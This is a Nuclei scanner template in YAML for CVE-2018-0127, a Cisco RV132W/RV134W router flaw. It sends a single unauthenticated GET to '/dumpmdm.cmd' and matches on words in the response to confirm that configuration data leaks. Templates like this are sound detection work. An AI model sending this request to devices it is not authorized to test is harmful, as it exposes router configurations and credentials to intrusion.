nuclei-templates/cves/2018/CVE-2018-0127.yaml

38 lines
1.1 KiB
YAML

id: CVE-2018-0127
info:
name: Cisco RV132W and RV134W Router Information Disclosure
author: jrolf
severity: critical
description: A vulnerability in the web interface of Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device, which could lead to the disclosure of confidential information.
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
- http://www.securitytracker.com/id/1040345
- http://www.securityfocus.com/bid/102969
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-0127
cwe-id: CWE-306
tags: cve,cve2018,cisco,router
requests:
- method: GET
path:
- "{{BaseURL}}/dumpmdm.cmd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
condition: and
words:
- "Dump"
- "MDM"
- "cisco"
- "admin"